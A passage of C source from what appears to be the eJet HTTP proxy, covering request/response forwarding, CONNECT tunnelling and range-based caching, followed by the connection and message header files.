HTTPMsg * proxymsg = NULL;
HeaderUnit * punit = NULL;
CacheInfo * cacinfo = NULL;
int i, num;
char buf[512];
int ret = 0;
if (!msg) return NULL;
/* firstly, check if the local storage has stored the request content.
if it has, return it to client. */
proxymsg = http_msg_fetch(msg->httpmgmt);
if (!proxymsg) return NULL;
proxymsg->SetMethod(proxymsg, msg->req_meth, -1);
proxymsg->SetURL(proxymsg, url, urllen, 1);
proxymsg->req_url_type = msg->req_url_type;
proxymsg->dstport = proxymsg->req_port;
str_cpy(proxymsg->srcip, msg->srcip);
proxymsg->srcport = msg->srcport;
/* duplicate all the request headers into proxy msg */
num = arr_num(msg->req_header_list);
for (i = 0; i < num; i++) {
punit = (HeaderUnit *)arr_value(msg->req_header_list, i);
if (!punit || !punit->name || punit->namelen < 1) {
continue;
}
if (strncasecmp(HUName(punit), "User-Agent", 10) == 0) {
str_secpy(buf, sizeof(buf)-1, HUValue(punit), punit->valuelen);
snprintf(buf + strlen(buf), sizeof(buf)-1-strlen(buf), " via eJet/%s", g_http_version);
http_header_append(proxymsg, 0, HUName(punit), punit->namelen, buf, strlen(buf));
} else {
http_header_append(proxymsg, 0, HUName(punit), punit->namelen,
HUValue(punit), punit->valuelen);
}
}
cacinfo = (CacheInfo *)msg->res_cache_info;
if (cacinfo) {
http_header_del(proxymsg, 0, "Range", -1);
#if defined(_WIN32) || defined(_WIN64)
sprintf(buf, "bytes=%I64d-", msg->cache_req_off);
#else
sprintf(buf, "bytes=%lld-", msg->cache_req_off);
#endif
if (msg->cache_req_len > 0 &&
msg->cache_req_off + msg->cache_req_len < cacinfo->body_length)
#if defined(_WIN32) || defined(_WIN64)
sprintf(buf+strlen(buf), "%I64d", msg->cache_req_off + msg->cache_req_len - 1);
#else
sprintf(buf+strlen(buf), "%lld", msg->cache_req_off + msg->cache_req_len - 1);
#endif
http_header_append(proxymsg, 0, "Range", -1, buf, strlen(buf));
}
proxymsg->cacheon = msg->cacheon;
if (http_header_get(msg, 0, "Connection", -1) == NULL) {
http_header_append(proxymsg, 0, "Connection", -1, "keep-alive", -1);
}
/* Using req_body_chunk to store body with the format of Content-Length or
Transfer-Encoding-chunked. There is no parsing for the chunked body */
proxymsg->req_body_flag = msg->req_body_flag;
proxymsg->req_body_length = msg->req_body_length;
proxymsg->req_multipart = msg->req_multipart;
proxymsg->req_conn_keepalive = msg->req_conn_keepalive;
proxymsg->partial_flag = msg->partial_flag;
for (i = 0; i < vstar_num(msg->partial_list); i++)
vstar_push(proxymsg->partial_list, vstar_get(msg->partial_list, i));
ret = http_req_encoding(proxymsg, 0);
if (ret < 0) {
http_msg_close(proxymsg);
return NULL;
}
msg->proxied = 1;
proxymsg->proxied = 2;
proxymsg->proxymsg = msg;
proxymsg->ploc = msg->ploc;
proxymsg->phost = msg->phost;
proxymsg->state = HTTP_MSG_SENDING;
return proxymsg;
}
int http_proxy_srv_send (void * vsrvcon, void * vsrvmsg)
{
HTTPCon * srvcon = (HTTPCon *)vsrvcon;
HTTPMsg * srvmsg = (HTTPMsg *)vsrvmsg;
HTTPCon * clicon = NULL;
HTTPMsg * climsg = NULL;
HTTPChunk * chunk = NULL;
frame_t * frm = NULL;
uint8 isend = 0;
int ret;
int rcvslen = 0;
uint8 * pbgn = NULL;
int num = 0;
if (!srvcon) return -1;
if (!srvmsg) return -2;
climsg = srvmsg->proxymsg;
if (!climsg) return -3;
clicon = climsg->pcon;
if (!clicon) return -4;
if (climsg->proxied != 1) return -10;
if (srvmsg->proxied != 2) return -11;
frm = clicon->rcvstream;
pbgn = frameP(frm);
num = frameL(frm);
if (num > 0) {
arr_push(srvmsg->req_rcvs_list, frm);
clicon->rcvstream = frame_new(8192);
}
chunk = (HTTPChunk *)srvmsg->req_chunk;
if (climsg->req_body_flag == BC_CONTENT_LENGTH &&
climsg->req_body_length - srvmsg->req_body_iolen > 0 && num > 0)
{
/* remaining body to be sent */
rcvslen = climsg->req_body_length - srvmsg->req_body_iolen;
rcvslen = min(num, rcvslen);
climsg->req_body_iolen += rcvslen;
srvmsg->req_body_iolen += rcvslen;
climsg->req_stream_recv += rcvslen;
isend = srvmsg->req_body_iolen >= climsg->req_body_length;
if (rcvslen > 0) {
chunk_add_bufptr(srvmsg->req_body_chunk, pbgn, rcvslen, frm);
}
} else if (climsg->req_body_flag == BC_TE && num > 0) {
ret = http_chunk_add_bufptr(chunk, pbgn, num, &rcvslen);
isend = chunk->gotall;
if (ret >= 0 && rcvslen > 0) {
chunk_add_bufptr(srvmsg->req_body_chunk, pbgn, rcvslen, frm);
}
climsg->req_body_iolen += rcvslen;
srvmsg->req_body_iolen += rcvslen;
climsg->req_stream_recv += rcvslen;
} else if (climsg->req_body_flag == BC_NONE || climsg->req_body_length == 0) {
isend = 1;
}
if (isend && num > rcvslen) {
frame_put_nfirst(clicon->rcvstream, pbgn + rcvslen, num - rcvslen);
}
if (isend) {
clicon->rcv_state = HTTP_CON_READY;
chunk_set_end(srvmsg->req_body_chunk);
} else {
clicon->rcv_state = HTTP_CON_WAITING_BODY;
}
return http_srv_send(srvcon);
}
int http_proxy_climsg_dup (void * vsrvmsg)
{
HTTPMsg * srvmsg = (HTTPMsg *)vsrvmsg;
HTTPMgmt * mgmt = NULL;
HTTPMsg * climsg = NULL;
HeaderUnit * punit = NULL;
int i, num;
int ret = 0;
if (!srvmsg) return -1;
climsg = (HTTPMsg *)srvmsg->proxymsg;
if (!climsg) return -2;
mgmt = (HTTPMgmt *)srvmsg->httpmgmt;
if (!mgmt) return -3;
if (climsg->issued) return 0;
/* set status code */
climsg->SetStatus(climsg, srvmsg->res_status, NULL);
/* duplicate all the response headers into client msg */
num = arr_num(srvmsg->res_header_list);
for (i = 0; i < num; i++) {
punit = (HeaderUnit *)arr_value(srvmsg->res_header_list, i);
if (!punit || !punit->name || punit->namelen < 1) {
continue;
}
http_header_append(climsg, 1, HUName(punit), punit->namelen,
HUValue(punit), punit->valuelen);
}
climsg->res_body_flag = srvmsg->res_body_flag;
climsg->res_body_length = srvmsg->res_body_length;
climsg->res_conn_keepalive = srvmsg->res_conn_keepalive;
climsg->res_store_file = srvmsg->res_store_file;
srvmsg->cacheon = climsg->cacheon;
if (http_header_get(climsg, 1, "Server", 6) == NULL)
http_header_append(climsg, 1, "Server", 6, mgmt->useragent, str_len(mgmt->useragent));
if (http_header_get(climsg, 1, "Date", 4) == NULL)
http_header_append_date(climsg, 1, "Date", 4, time(NULL));
if (http_header_get(climsg, 1, "Accept-Ranges", 13) == NULL)
http_header_append(climsg, 1, "Accept-Ranges", 13, "bytes", 5);
if (climsg->cacheon && climsg->res_cache_info) {
http_cache_response_header(climsg, climsg->res_cache_info);
}
ret = http_res_encoding(climsg);
if (ret < 0) {
http_msg_close(climsg);
return -100;
}
climsg->issued = 1;
climsg->state = HTTP_MSG_REQUEST_HANDLED;
return 0;
}
int http_proxy_cli_send (void * vclicon, void * vclimsg)
{
HTTPCon * clicon = (HTTPCon *)vclicon;
HTTPMsg * climsg = (HTTPMsg *)vclimsg;
HTTPCon * srvcon = NULL;
HTTPMsg * srvmsg = NULL;
HTTPChunk * chunk = NULL;
frame_t * frm = NULL;
uint8 isend = 0;
int ret;
int rcvslen = 0;
uint8 * pbgn = NULL;
int num = 0;
if (!clicon) return -1;
if (!climsg) return -2;
srvmsg = climsg->proxymsg;
if (!srvmsg) return -3;
srvcon = srvmsg->pcon;
if (!srvcon) return -4;
if (climsg->proxied != 1) return -10;
if (srvmsg->proxied != 2) return -11;
frm = srvcon->rcvstream;
pbgn = frameP(frm);
num = frameL(frm);
if (num > 0) {
arr_push(climsg->res_rcvs_list, frm);
srvcon->rcvstream = frame_new(8192);
}
chunk = (HTTPChunk *)climsg->res_chunk;
if (srvmsg->res_body_flag == BC_CONTENT_LENGTH &&
srvmsg->res_body_length - climsg->res_body_iolen > 0 && num > 0)
{
/* remaining body to be sent */
rcvslen = srvmsg->res_body_length - climsg->res_body_iolen;
rcvslen = min(num, rcvslen);
srvmsg->res_body_iolen += rcvslen;
climsg->res_body_iolen += rcvslen;
srvmsg->res_stream_recv += rcvslen;
isend = climsg->res_body_iolen >= srvmsg->res_body_length ? 1 : 0;
if (rcvslen > 0) {
chunk_add_bufptr(climsg->res_body_chunk, pbgn, rcvslen, frm);
}
} else if (srvmsg->res_body_flag == BC_TE && num > 0) {
ret = http_chunk_add_bufptr(chunk, pbgn, num, &rcvslen);
isend = chunk->gotall;
if (ret >= 0 && rcvslen > 0) {
chunk_add_bufptr(climsg->res_body_chunk, pbgn, rcvslen, frm);
}
srvmsg->res_body_iolen += rcvslen;
climsg->res_body_iolen += rcvslen;
srvmsg->res_stream_recv += rcvslen;
} else if (srvmsg->res_body_flag == BC_NONE || srvmsg->res_body_length == 0) {
isend = 1;
}
if (isend && num > rcvslen) {
frame_put_nfirst(srvcon->rcvstream, pbgn + rcvslen, num - rcvslen);
}
if (isend) {
/* all data from origin server are received. srvmsg can be closed now! */
http_con_msg_del(srvcon, srvmsg);
http_msg_close(srvmsg);
srvcon->rcv_state = HTTP_CON_READY;
chunk_set_end(climsg->res_body_chunk);
} else {
srvcon->rcv_state = HTTP_CON_WAITING_BODY;
}
return http_cli_send(clicon);
}
int http_proxy_srvbody_del (void * vsrvcon, void * vsrvmsg)
{
HTTPCon * srvcon = (HTTPCon *)vsrvcon;
HTTPMsg * srvmsg = (HTTPMsg *)vsrvmsg;
int num = 0;
int bodylen = 0;
uint8 * pbgn = NULL;
int ret = 0;
HTTPChunk * chunk = NULL;
if (!srvcon) return -1;
if (!srvmsg) return -2;
if (srvmsg->proxied != 2) return -11;
if (srvmsg != http_con_msg_first(srvcon))
return -100;
pbgn = frameP(srvcon->rcvstream);
num = frameL(srvcon->rcvstream);
if (srvmsg->res_body_flag == BC_CONTENT_LENGTH) {
bodylen = srvmsg->res_body_length - srvmsg->res_stream_sent;
if (bodylen <= num) {
frame_del_first(srvcon->rcvstream, bodylen);
srvmsg->res_stream_sent += bodylen;
return 1; //body removed completely
} else {
frame_del_first(srvcon->rcvstream, num);
srvmsg->res_stream_sent += num;
return 0; //body is not enough
}
} else if (srvmsg->res_body_flag == BC_TE) {
chunk = (HTTPChunk *)srvmsg->res_chunk;
ret = http_chunk_add_bufptr(srvmsg->res_chunk, pbgn, num, &bodylen);
if (ret >= 0 && bodylen > 0) {
frame_del_first(srvcon->rcvstream, bodylen);
srvmsg->res_stream_sent += bodylen;
}
if (chunk->gotall) {
return 1;
} else {
return 0;
}
}
return 1;
}
void * http_proxy_connect_tunnel (void * vcon, void * vmsg)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HTTPCon * tunnelcon = NULL;
if (!pcon || !msg) return NULL;
if (pcon->httptunnel && pcon->tunnelcon)
return pcon->tunnelcon;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return NULL;
/* set the tunnel flag for client-side HTTPCon */
pcon->httptunnel = 1;
pcon->tunnelcon = NULL;
msg->dstport = msg->req_port;
/* check if the destinated server of http connect request is itself */
if (http_listen_check_self(msg->httpmgmt,
msg->req_host,
msg->req_hostlen,
msg->dstip, msg->dstport) > 0)
{
pcon->tunnelself = 1;
return NULL;
}
tunnelcon = http_con_open(NULL, msg->dstip, msg->dstport, 0);
if (tunnelcon) {
iodev_workerid_set(tunnelcon->pdev, 1);
tunnelcon->httptunnel = 2;
tunnelcon->tunnelcon = pcon;
tunnelcon->tunnelconid = pcon->conid;
pcon->tunnelcon = tunnelcon;
pcon->tunnelconid = tunnelcon->conid;
return tunnelcon;
}
return NULL;
}
int http_tunnel_srv_send (void * vclicon, void * vsrvcon)
{
HTTPCon * clicon = (HTTPCon *)vclicon;
HTTPCon * srvcon = (HTTPCon *)vsrvcon;
HTTPMgmt * mgmt = NULL;
int sentnum = 0;
int ret = 0;
struct iovec iov[4];
int iovcnt = 0;
if (!clicon) return -1;
if (!srvcon) return -2;
mgmt = (HTTPMgmt *)clicon->mgmt;
if (!mgmt) return -3;
if (clicon->httptunnel != 1 && clicon->tunnelcon != srvcon)
return -10;
if (srvcon->httptunnel != 2 && srvcon->tunnelcon != clicon)
return -11;
if (frameL(clicon->rcvstream) <= 0)
return 0;
if (srvcon->snd_state < HTTP_CON_SEND_READY) {
iodev_add_notify(srvcon->pdev, RWF_WRITE);
return 0;
}
iov[iovcnt].iov_base = frameP(clicon->rcvstream);
iov[iovcnt].iov_len = frameL(clicon->rcvstream);
iovcnt++;
ret = http_con_writev(srvcon, iov, iovcnt, &sentnum, NULL);
if (ret < 0) {
return -200;
}
time(&srvcon->stamp);
frame_del_first(clicon->rcvstream, sentnum);
if (frameL(clicon->rcvstream) > 0) {
iodev_add_notify(srvcon->pdev, RWF_WRITE);
}
if (sentnum > 0)
http_srv_send_cc(srvcon);
return sentnum;
}
int http_tunnel_cli_send (void * vsrvcon, void * vclicon)
{
HTTPCon * srvcon = (HTTPCon *)vsrvcon;
HTTPCon * clicon = (HTTPCon *)vclicon;
HTTPMgmt * mgmt = NULL;
int sentnum = 0;
int ret = 0;
struct iovec iov[4];
int iovcnt = 0;
if (!srvcon) return -1;
if (!clicon) return -2;
mgmt = (HTTPMgmt *)srvcon->mgmt;
if (!mgmt) return -3;
if (srvcon->httptunnel != 2 && srvcon->tunnelcon != clicon)
return -10;
if (clicon->httptunnel != 1 && clicon->tunnelcon != srvcon)
return -11;
if (frameL(srvcon->rcvstream) <= 0)
return 0;
if (clicon->snd_state < HTTP_CON_SEND_READY) {
iodev_add_notify(clicon->pdev, RWF_WRITE);
return 0;
}
iov[iovcnt].iov_base = frameP(srvcon->rcvstream);
iov[iovcnt].iov_len = frameL(srvcon->rcvstream);
iovcnt++;
ret = http_con_writev(clicon, iov, iovcnt, &sentnum, NULL);
if (ret < 0) {
return -200;
}
time(&clicon->stamp);
time(&srvcon->stamp);
frame_del_first(srvcon->rcvstream, sentnum);
if (frameL(srvcon->rcvstream) > 0) {
iodev_add_notify(clicon->pdev, RWF_WRITE);
}
if (sentnum > 0)
http_cli_send_cc(clicon);
return sentnum;
}
int http_proxy_cli_cache_send (void * vclicon, void * vclimsg)
{
HTTPCon * clicon = (HTTPCon *)vclicon;
HTTPMsg * climsg = (HTTPMsg *)vclimsg;
CacheInfo * cacinfo = NULL;
int64 reqpos = 0;
int64 bodysize = 0;
int64 restlen = 0;
int64 datapos = 0;
int64 datalen = 0;
int64 ilen = 0;
int ret = 0;
static int CHUNKLEN = 1024*1024;
if (!clicon) return -1;
if (!climsg) return -2;
cacinfo = (CacheInfo *)climsg->res_cache_info;
if (!cacinfo) {
return http_proxy_cli_send(clicon, climsg);
}
/* allow the multiple HTTPMsg in HTTPCon queue and handled in pipeline */
if (climsg != http_con_msg_first(clicon)) {
return -100;
}
if (climsg->issued <= 0) {
return 0;
}
bodysize = chunk_size(climsg->res_body_chunk, 0);
bodysize -= climsg->res_header_length;
reqpos = climsg->cache_req_start + bodysize;
if (climsg->res_body_flag == BC_CONTENT_LENGTH) {
/* calculate length of remaining data to send */
restlen = climsg->res_body_length - bodysize;
if (restlen <= 0) goto sendnow;
ret = frag_pack_contain(cacinfo->frag, reqpos, -1, &datapos, &datalen, NULL, NULL);
if (ret >= 2) {
/* the contiguous data length is greater than remaining length */
if (datalen > restlen) datalen = restlen;
ret = chunk_add_file(climsg->res_body_chunk, cacinfo->cache_tmp, datapos, datalen, 1);
if (chunk_size(climsg->res_body_chunk, 0) >= climsg->res_body_length + climsg->res_header_length) {
chunk_set_end(climsg->res_body_chunk);
}
} else {
/* no data existing in the position of the cache, need to request to origin server */
if (climsg->proxymsg == NULL &&
frag_pack_complete(cacinfo->frag) <= 0 &&
http_request_in_cache(climsg) <= 0)
{
http_proxy_srv_cache_send(climsg);
}
}
} else if (climsg->res_body_flag == BC_TE) {
ret = frag_pack_contain(cacinfo->frag, reqpos, -1, &datapos, &datalen, NULL, NULL);
if (ret >= 2) {
for (ilen = 0; datalen > 0; ) {
if (datalen > CHUNKLEN) {
ret = chunk_add_file(climsg->res_body_chunk, cacinfo->cache_tmp, datapos + ilen, CHUNKLEN, 0);
ilen += CHUNKLEN;
datalen -= CHUNKLEN;
} else {
ret = chunk_add_file(climsg->res_body_chunk, cacinfo->cache_tmp, datapos + ilen, datalen, 0);
ilen += datalen;
datalen = 0;
}
if (chunk_size(climsg->res_body_chunk, 1) > 50*1024*1024) break;
}
if (datalen == 0 && http_chunk_gotall(climsg->res_chunk)) {
/* available data from position of Raw cache file are all added into chunk,
all response body in proxy request to origin are received. */
chunk_set_end(climsg->res_body_chunk);
}
} else {
/* no data existing in the position of the cache, need to request to origin server */
if (climsg->proxymsg == NULL &&
frag_pack_complete(cacinfo->frag) <= 0 &&
http_request_in_cache(climsg) <= 0)
{
http_proxy_srv_cache_send(climsg);
}
}
}
sendnow:
bodysize = chunk_size(climsg->res_body_chunk, climsg->res_body_flag == BC_TE ? 1 : 0);
if (climsg->res_stream_sent < bodysize)
http_cli_send(clicon);
return 1;
}
int http_proxy_srv_cache_store (void * vsrvcon, void * vsrvmsg)
{
HTTPCon * srvcon = (HTTPCon *)vsrvcon;
HTTPMsg * srvmsg = (HTTPMsg *)vsrvmsg;
HTTPCon * clicon = NULL;
HTTPMsg * climsg = NULL;
HTTPMgmt * mgmt = NULL;
CacheInfo * cacinfo = NULL;
char * pbody = NULL;
int bodylen = 0;
int wlen = 0;
int64 filepos = 0;
int64 restlen = 0;
int ret, rmlen = 0;
uint8 justsaveit = 0;
if (!srvcon) return -1;
if (!srvmsg) return -2;
climsg = srvmsg->proxymsg;
if (!climsg) return -3;
clicon = climsg->pcon;
if (!clicon) return -4;
mgmt = (HTTPMgmt *)climsg->httpmgmt;
if (!mgmt) return -5;
if (climsg->proxied != 1) return -10;
if (srvmsg->proxied != 2) return -11;
cacinfo = (CacheInfo *)climsg->res_cache_info;
if (!cacinfo) {
return http_proxy_cli_send(clicon, climsg);
}
/* allow the multiple HTTPMsg in HTTPCon queue and handled in pipeline */
if (climsg != http_con_msg_first(clicon)) {
justsaveit = 1;
}
pbody = frameP(srvcon->rcvstream);
bodylen = frameL(srvcon->rcvstream);
if (climsg->res_body_flag == BC_CONTENT_LENGTH) {
restlen = climsg->res_body_length - climsg->res_body_iolen;
if (restlen <= 0) {
/* got all body content of the current request, but possibly not all the file content */
chunk_set_end(climsg->res_body_chunk);
climsg->proxymsg = NULL;
srvcon->rcv_state = HTTP_CON_READY;
http_con_msg_del(srvcon, srvmsg);
srvcon->msg = NULL;
http_msg_close(srvmsg);
goto clisend;
}
srvcon->rcv_state = HTTP_CON_WAITING_BODY;
if (bodylen <= 0) goto clisend;
if (restlen <= bodylen)
bodylen = restlen;
#if defined(_WIN32) || defined(_WIN64)
filepos = native_file_offset(climsg->res_file_handle);
#else
filepos = lseek(native_file_fd(climsg->res_file_handle), 0, SEEK_CUR);
#endif
wlen = native_file_write(climsg->res_file_handle, pbody, bodylen);
if (wlen > 0) {
frame_del_first(srvcon->rcvstream, wlen);
climsg->res_body_iolen += wlen;
cache_info_add_frag(cacinfo, filepos, wlen, 0);
}
if (climsg->res_body_iolen >= climsg->res_body_length) {
/* got all body content of the current request, but possibly not all the file content */
climsg->proxymsg = NULL;
srvcon->rcv_state = HTTP_CON_READY;
http_con_msg_del(srvcon, srvmsg);
srvcon->msg = NULL;
http_msg_close(srvmsg);
}
} else if (climsg->res_body_flag == BC_TE) {
if (http_chunk_gotall(climsg->res_chunk)) {
/* got all body content of the current request, but possibly not all the file content */
chunk_set_end(climsg->res_body_chunk);
climsg->proxymsg = NULL;
srvcon->rcv_state = HTTP_CON_READY;
http_con_msg_del(srvcon, srvmsg);
srvcon->msg = NULL;
http_msg_close(srvmsg);
goto clisend;
}
srvcon->rcv_state = HTTP_CON_WAITING_BODY;
if (bodylen <= 0) goto clisend;
ret = http_chunk_add_bufptr(climsg->res_chunk, pbody, bodylen, &rmlen);
if (ret < 0) return -30;
if (rmlen <= 0) goto clisend;
#if defined(_WIN32) || defined(_WIN64)
filepos = native_file_offset(climsg->res_file_handle);
#else
filepos = lseek(native_file_fd(climsg->res_file_handle), 0, SEEK_CUR);
#endif
/* parsed body content without containing hex-length\r\n will be writen into cache file */
wlen = restlen = chunk_rest_size(http_chunk_obj(climsg->res_chunk), 0);
climsg->res_body_iolen += restlen;
climsg->res_body_length += restlen;
chunk_readto_file(http_chunk_obj(climsg->res_chunk),
native_file_fd(climsg->res_file_handle), 0, -1, 0);
chunk_remove(http_chunk_obj(climsg->res_chunk), climsg->res_body_length, 0);
frame_del_first(srvcon->rcvstream, rmlen);
if (http_chunk_gotall(climsg->res_chunk)) {
/* got all body content of the current request, but possibly not all the file content */
climsg->proxymsg = NULL;
/* add the frag-segment into file, check if all the contents are gotton */
cache_info_add_frag(cacinfo, filepos, restlen, 1);
srvcon->rcv_state = HTTP_CON_READY;
http_con_msg_del(srvcon, srvmsg);
srvcon->msg = NULL;
http_msg_close(srvmsg);
goto clisend;
} else {
cache_info_add_frag(cacinfo, filepos, restlen, 0);
}
}
clisend:
if (!justsaveit) {
http_proxy_cli_cache_send(clicon, climsg);
}
return 0;
}
void * http_proxy_srv_cache_send (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMsg * srvmsg = NULL;
HeaderUnit * punit = NULL;
CacheInfo * cacinfo = NULL;
int i, num;
char buf[512];
int ret = 0;
if (!msg) return NULL;
srvmsg = http_msg_fetch(msg->httpmgmt);
if (!srvmsg) return NULL;
srvmsg->SetMethod(srvmsg, "GET", 3);
srvmsg->SetURL(srvmsg, msg->fwdurl, msg->fwdurllen, 1);
srvmsg->req_url_type = msg->req_url_type;
srvmsg->dstport = srvmsg->req_port;
str_cpy(srvmsg->srcip, msg->srcip);
srvmsg->srcport = msg->srcport;
/* duplicate all the request headers into proxy msg */
num = arr_num(msg->req_header_list);
for (i = 0; i < num; i++) {
punit = (HeaderUnit *)arr_value(msg->req_header_list, i);
if (!punit || !punit->name || punit->namelen < 1) {
continue;
}
if (strncasecmp(HUName(punit), "User-Agent", 10) == 0) {
str_secpy(buf, sizeof(buf)-1, HUValue(punit), punit->valuelen);
snprintf(buf + strlen(buf), sizeof(buf)-1-strlen(buf), " via eJet/%s", g_http_version);
http_header_append(srvmsg, 0, HUName(punit), punit->namelen, buf, strlen(buf));
} else {
http_header_append(srvmsg, 0, HUName(punit), punit->namelen,
HUValue(punit), punit->valuelen);
}
}
cacinfo = (CacheInfo *)msg->res_cache_info;
if (cacinfo) {
http_header_del(srvmsg, 0, "Range", -1);
#if defined(_WIN32) || defined(_WIN64)
sprintf(buf, "bytes=%I64d-", msg->cache_req_off);
#else
sprintf(buf, "bytes=%lld-", msg->cache_req_off);
#endif
if (msg->cache_req_len > 0 &&
msg->cache_req_off + msg->cache_req_len < cacinfo->body_length)
#if defined(_WIN32) || defined(_WIN64)
sprintf(buf+strlen(buf), "%I64d", msg->cache_req_off + msg->cache_req_len - 1);
#else
sprintf(buf+strlen(buf), "%lld", msg->cache_req_off + msg->cache_req_len - 1);
#endif
http_header_append(srvmsg, 0, "Range", -1, buf, strlen(buf));
}
if (http_header_get(msg, 0, "Connection", -1) == NULL) {
http_header_append(srvmsg, 0, "Connection", -1, "keep-alive", -1);
}
http_header_del(srvmsg, 0, "Content-Length", -1);
http_header_del(srvmsg, 0, "Content-Type", -1);
http_header_del(srvmsg, 0, "Transfer-Encoding", 17);
srvmsg->req_body_flag = BC_NONE;
srvmsg->req_body_length = 0;
srvmsg->req_multipart = 0;
srvmsg->req_conn_keepalive = 1;
ret = http_req_encoding(srvmsg, 0);
if (ret < 0) {
http_msg_close(srvmsg);
return NULL;
}
srvmsg->proxied = 2;
srvmsg->proxymsg = msg;
srvmsg->ploc = msg->ploc;
srvmsg->phost = msg->phost;
srvmsg->state = HTTP_MSG_SENDING;
msg->proxymsg = srvmsg;
if (http_srv_msg_dns(srvmsg, http_srv_msg_dns_cb) < 0) {
http_msg_close(srvmsg);
return NULL;
}
return srvmsg;
}
<|start_filename|>include/http_con.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_CON_H_
#define _HTTP_CON_H_
#include "http_listen.h"
#include "http_msg.h"
#ifdef HAVE_OPENSSL
#include <openssl/ssl.h>
#include <openssl/err.h>
#endif
#ifdef __cplusplus
extern "C" {
#endif
/* HTTP Method Constants Definition */
#define HTTP_METHOD_NONE 0
#define HTTP_METHOD_CONNECT 1
#define HTTP_METHOD_DELETE 2
#define HTTP_METHOD_GET 3
#define HTTP_METHOD_HEAD 4
#define HTTP_METHOD_VERSION_10 5
#define HTTP_METHOD_VERSION_11 6
#define HTTP_METHOD_OPTIONS 7
#define HTTP_METHOD_POST 8
#define HTTP_METHOD_PUT 9
#define HTTP_METHOD_TRACE 10
/* timer command id that identify the timeout event type */
#define t_http_srv_con_build 2120
#define t_http_cli_con_life 2121
#define t_http_srv_con_life 2122
/* HTTP connection automation state definition for HTTP Receiving (Request or Response) */
#define HTTP_CON_NULL 0
#define HTTP_CON_READY 1
#define HTTP_CON_SSL_HANDSHAKING 2
#define HTTP_CON_RECVING 3
#define HTTP_CON_WAITING_HEADER 4
#define HTTP_CON_WAITING_BODY 5
/* HTTP connection automation state definition for HTTP Sending (Request or Response) */
#define HTTP_CON_IDLE 0
#define HTTP_CON_CONNECTING 10
#define HTTP_CON_SEND_READY 11
#define HTTP_CON_FEEDING 12
typedef struct http_con {
void * res[2];
HTTPListen * hl;
uint8 casetype;
RequestDiag * reqdiag;
void * reqdiagobj;
ulong conid;
int rcv_state;
int snd_state;
/* for accepting client-request case, srcip is client-side ip and
dstip is server ip itself.
for sending http-request by connecting to origin, dstip is origin server ip. */
char srcip[41];
int srcport;
char dstip[41];
int dstport;
/* reading or writing data by following socket communication facilities */
CRITICAL_SECTION rcvCS;
void * pdev;
#ifdef HAVE_OPENSSL
SSL_CTX * sslctx;
SSL * ssl;
#endif
struct http_con * tunnelcon;
ulong tunnelconid;
int read_ignored;
frame_p rcvstream;
void * ready_timer;
time_t stamp;
time_t createtime;
time_t transbgn;
void * life_timer;
unsigned retrytimes : 4;
unsigned reqnum : 10;
unsigned resnum : 10;
unsigned keepalive : 1;
unsigned ssl_link : 1;
unsigned ssl_handshaked : 1;
/* sending request and receiving response is named as one transaction.
pcon's transact flag is a state if it's in processing of sending or receiving.
0-idle 1-sending request or waiting response */
unsigned transact : 1;
unsigned httptunnel : 2;
unsigned tunnelself : 1;
/* client request HTTPMsg instance */
HTTPMsg * msg;
/* multiple requests occur over single tcp connection, response
* should be pipelined to reply to client */
arr_t * msg_list;
CRITICAL_SECTION msglistCS;
/* system management instance */
void * pcore;
void * mgmt;
void * srv;
} HTTPCon;
int http_con_cmp_http_con(void * a, void * b);
int http_con_cmp_conid (void * a, void * pat);
ulong http_con_hash_func (void * key);
/* http connection instance release/initialize/recycle routines */
int http_con_init (void * vcon);
int http_con_free (void * vcon);
int http_con_recycle (void * vcon);
void * http_con_fetch (void * vmgmt);
void * http_con_open (void * vsrv, char * dstip, int dstport, int ssl_link);
int http_con_close (void * vcon);
int http_con_connect (void * vpcon);
int http_con_connected (void * vpcon);
char * http_con_srcip (void * vcon);
int http_con_srcport (void * vcon);
int http_con_reqnum (void * vcon);
ulong http_con_id (void * vcon);
void * http_con_iodev (void * vcon);
int http_con_msg_add (void * vcon, void * vmsg);
int http_con_msg_del (void * vcon, void * vmsg);
void * http_con_msg_first (void * vcon);
void * http_con_msg_last (void * vcon);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_msg.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_MSG_H_
#define _HTTP_MSG_H_
#include "http_uri.h"
#ifdef __cplusplus
extern "C" {
#endif
typedef int RecvAllNotify (void * vmsg, void * para, void * cbval, int status);
typedef int TearDownNotify (void * vmsg, void * para);
#define REUSE_BUF_THRESHOLD 64*1024
/* how to count or recognize the Request/Response Body Content
* define several cases to identify the body */
#define BC_NONE 0
#define BC_CONTENT_LENGTH 1
#define BC_TE 2
#define BC_TE_INVALID 3
#define BC_UNKNOWN 4
#define BC_TUNNEL 5
/* HTTPMsg state definition when acting as HTTPServer, HTTPProxy, HTTPGateway */
#define HTTP_MSG_NULL 0
#define HTTP_MSG_REQUEST_RECVING 1
#define HTTP_MSG_REQUEST_HANDLING 2
#define HTTP_MSG_REQUEST_HANDLED 3
#define HTTP_MSG_RESPONSE_SENDING 4
#define HTTP_MSG_REQUEST_SENDING 5
#define HTTP_MSG_REQUEST_SENT 6
#define HTTP_MSG_RESPONSE_RECVING 7
#define HTTP_MSG_RESPONSE_HANDLING 8
#define HTTP_MSG_OVER 17
/* HTTPMsg state definition when acting as HTTPClient */
#define HTTP_MSG_SENDING 10
#define HTTP_MSG_SENT 11
#define HTTP_MSG_RECVING_RESP 12
#define HTTP_MSG_RECV_END 13
/* http partial request header format as following:
Range: bytes=0-499 #given range from 0 to 499, total 500 bytes
Range: bytes=500- #given range from 500 to end, total bytes: size-500
Range: bytes=-200 #indicate the last 200 bytes, total bytes: 200
Range: bytes=500-550,601-999 #given 2 ranges, total bytes: 550-500+1 + 999-601+1
*/
typedef struct http_partial_s {
/* 1 - bytes=0-499,700-900
2 - bytes=500-
3 - bytes=-200
0 - unknown */
uint8 partflag;
int64 start;
int64 end;
int64 length;
int64 fsize;
} http_partial_t;
typedef struct http_msg {
void * res[2];
/* global unique identifier for HTTPMsg */
ulong msgid;
